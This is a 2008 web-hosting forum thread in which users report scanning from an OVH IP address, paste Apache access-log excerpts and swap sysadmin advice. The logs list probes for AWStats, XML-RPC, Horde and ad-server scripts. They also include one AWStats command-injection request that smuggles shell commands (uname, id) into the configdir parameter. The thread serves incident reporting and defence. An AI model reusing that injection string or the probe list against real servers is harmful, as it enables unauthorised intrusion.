gregoryfenton
27-06-2008, 09:20
Thank you very much Oles.
I knew going with OVH was the right thing to do
I knew going with OVH was the right thing to do
Web vulnerability attack from OVH member
oles@ovh.net
27-06-2008, 07:42
> 91.121.13.194
I have the alertes from this IP Jun 24 20:51:58 to SSH
and Jun 26 18:46:44 to WWW. Soon all servers that scan
will be rebooted in 15 secondes on rescue.
I have the alertes from this IP Jun 24 20:51:58 to SSH
and Jun 26 18:46:44 to WWW. Soon all servers that scan
will be rebooted in 15 secondes on rescue.
gregoryfenton
27-06-2008, 00:06
Nah not scared at all, I just happened to be tailing the access log waiting for someone to connect to a document I was hosting when I saw the attack.
I only posted here because it seemed a more logical place to report it - your post confirms that I am not the only person being probed by the IP.
Maybe someone up high needs to have a quiet word about the legality of attacking servers with the user of the IP address?
I only posted here because it seemed a more logical place to report it - your post confirms that I am not the only person being probed by the IP.
Maybe someone up high needs to have a quiet word about the legality of attacking servers with the user of the IP address?
Murph
26-06-2008, 23:40
Nothing new there, to be honest. Some malware is optimised to attack nearby hosts, some has been human-targetted at nearby hosts, and random chance will make some attacks local.
If you want something done about it, you'd be better sending it to abuse@ovh.net. To be honest, I mostly ignore them, although persistent offenders tend to get reported and/or firewalled. The Internet is an evil, nasty, vicious, malware-infested swamp (as a sysadmin/netadmin, you have to assume that 100% of public hosts, connections, requests, etc are evil), so you need to have all of your open services fully patched, protected, and properly configured at all times.
If you maintain your system well, subscribe to security and errata bulletins appropriate to your platform and applications, and are very careful with configuration and home-grown code, then you can mostly ignore the constant stream of incoming crud. If not, you shouldn't be running a server which accepts connections from the public net, as you'll soon be part of the problem (your host will be compromised and used for attacks, fraud, and other illegal activity or general maliciousness, some of which could result in an awkward conversation with your friendly neighbourhood law enforcement).
Scared yet? Well, unless you are a seasoned Internet sysadmin, you should be scared.
And confirmed, 91.121.13.194 attacked my server too:
Here's a count of the number of individual probably malicious requests I have received from 91.121.0.0/16 since 12/Jun/2008 (these are all requests which have been made with an invalid vhost):
123 91.121.118.225
86 91.121.13.194
33 91.121.158.38
32 91.121.146.224
28 91.121.123.165
12 91.121.15.201
6 91.121.22.42
6 91.121.147.13
4 91.121.0.66
3 91.121.9.163
And to put it in context, here's a list of all hosts outside 91.121.0.0/16 sending the same invalid requests since 12/Jun:
848 194.16.54.75
639 81.25.144.138
320 91.65.224.23
255 213.186.41.96
245 87.118.120.2
99 62.193.233.138
98 66.132.150.72
63 140.247.162.153
56 74.55.16.66
44 81.208.92.7
40 80.254.49.82
33 125.129.220.241
25 195.218.5.16
22 213.251.135.133
21 212.183.8.27
12 82.211.81.100
10 86.104.228.111
If you want something done about it, you'd be better sending it to abuse@ovh.net. To be honest, I mostly ignore them, although persistent offenders tend to get reported and/or firewalled. The Internet is an evil, nasty, vicious, malware-infested swamp (as a sysadmin/netadmin, you have to assume that 100% of public hosts, connections, requests, etc are evil), so you need to have all of your open services fully patched, protected, and properly configured at all times.
If you maintain your system well, subscribe to security and errata bulletins appropriate to your platform and applications, and are very careful with configuration and home-grown code, then you can mostly ignore the constant stream of incoming crud. If not, you shouldn't be running a server which accepts connections from the public net, as you'll soon be part of the problem (your host will be compromised and used for attacks, fraud, and other illegal activity or general maliciousness, some of which could result in an awkward conversation with your friendly neighbourhood law enforcement).
Scared yet? Well, unless you are a seasoned Internet sysadmin, you should be scared.
And confirmed, 91.121.13.194 attacked my server too:
Code:
91.121.13.194 - - [26/Jun/2008:17:05:05 +0000] "GET /awstats/awstats/wwwroot/cgi-bin/awstats.pl HTTP/1.1" 403 1492 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 230 1986 ... lots of crud omitted ... 91.121.13.194 - - [26/Jun/2008:18:59:13 +0000] "GET /mag/blog/xmlrpc.php HTTP/1.1" 403 1492 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 207 1986
123 91.121.118.225
86 91.121.13.194
33 91.121.158.38
32 91.121.146.224
28 91.121.123.165
12 91.121.15.201
6 91.121.22.42
6 91.121.147.13
4 91.121.0.66
3 91.121.9.163
And to put it in context, here's a list of all hosts outside 91.121.0.0/16 sending the same invalid requests since 12/Jun:
848 194.16.54.75
639 81.25.144.138
320 91.65.224.23
255 213.186.41.96
245 87.118.120.2
99 62.193.233.138
98 66.132.150.72
63 140.247.162.153
56 74.55.16.66
44 81.208.92.7
40 80.254.49.82
33 125.129.220.241
25 195.218.5.16
22 213.251.135.133
21 212.183.8.27
12 82.211.81.100
10 86.104.228.111
gregoryfenton
26-06-2008, 22:58
Continued as this forum limits posts to 10,000 characters.
Code:
91.121.13.194 - - [26/Jun/2008:20:38:50 +0200] "GET /xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /blog/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /drupal/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /community/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /blogs/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /wordpress/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /phpgroupware/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:51 +0200] "GET /adxmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:52 +0200] "GET /adserver/adxmlrpc.php HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:52 +0200] "GET /phpAdsNew/adxmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:58 +0200] "GET /Ads/adxmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:39:01 +0200] "GET /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:39:01 +0200] "GET /xmlrpc/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:39:01 +0200] "GET /xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:39:22 +0200] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:39:22 +0200] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:39:22 +0200] "GET /wordpress/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:39:22 +0200] "GET /phpgroupware/xmlrpc.php^M HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:39:25 +0200] "GET /mag/blog/xmlrpc.php HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:39:25 +0200] "GET HTTP/1.1" 400 317 "-" "-"
gregoryfenton
26-06-2008, 22:57
grep from my access.log
Code:
91.121.13.194 - - [26/Jun/2008:18:51:29 +0200] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:29 +0200] "GET /awstat/cgi-bin/awstats.pl HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:29 +0200] "GET /awstats.pl HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:29 +0200] "GET /awstats.pl/awstats.pl HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:29 +0200] "GET /awstats/awstats.pl HTTP/1.1" 200 924 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /cgi-bin/stats/awstats.pl HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /cgi/awstats.pl HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /cgi/stats/awstats.pl HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scgi-bin/awstats.pl HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scgi-bin/awstats/awstats.pl HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scgi/awstats.pl HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scgi/stats/awstats.pl HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scripts/awstats.pl HTTP/1.1" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scripts/awstats/awstats.pl HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:44 +0200] "GET /scripts/awstats/awstats.pl/awstats.pl HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:45 +0200] "GET /secure/web-admin/awstats.pl HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:48 +0200] "GET /stats/awstats.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:51:54 +0200] "GET /web-admin/awstats.pl HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:52:00 +0200] "GET /~quasi/awstats.pl HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:52:06 +0200] "GET /technical/software/awstats/cgi-bin/awstats.pl HTTP/1.1" 404 332 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:18:52:06 +0200] "GET /_system_/awstats/awstats.pl HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:19:39:37 +0200] "GET /awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3buname%20%2dsnrmo%3bid%3becho%20e_exp%3b%2500 HTTP/1.1" 200 1050 "-" "-" 91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /Horde-2.1.1/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /Horde-2.1.2/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /Horde-2.2.9/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /Horde-3.0.9/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /Horde-3.1.1/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:15 +0200] "GET /Horde/ HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:16 +0200] "GET /Horde0/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /Horde1/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /Horde2/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /Horde3/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /horde-2.1.1/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /horde-2.1.2/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /horde-2.2.9/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /horde-3.0.9/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /horde-3.1.1/ HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:17 +0200] "GET /horde/ HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:18 +0200] "GET /horde0/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:18 +0200] "GET /horde1/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:18 +0200] "GET /horde2/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:03:18 +0200] "GET /horde3/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /adxmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /adserver/adxmlrpc.php HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /phpAdsNew/adxmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /phpadsnew/adxmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /phpads/adxmlrpc.php HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /Ads/adxmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /ads/adxmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 91.121.13.194 - - [26/Jun/2008:20:38:49 +0200] "GET /xmlrpc/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"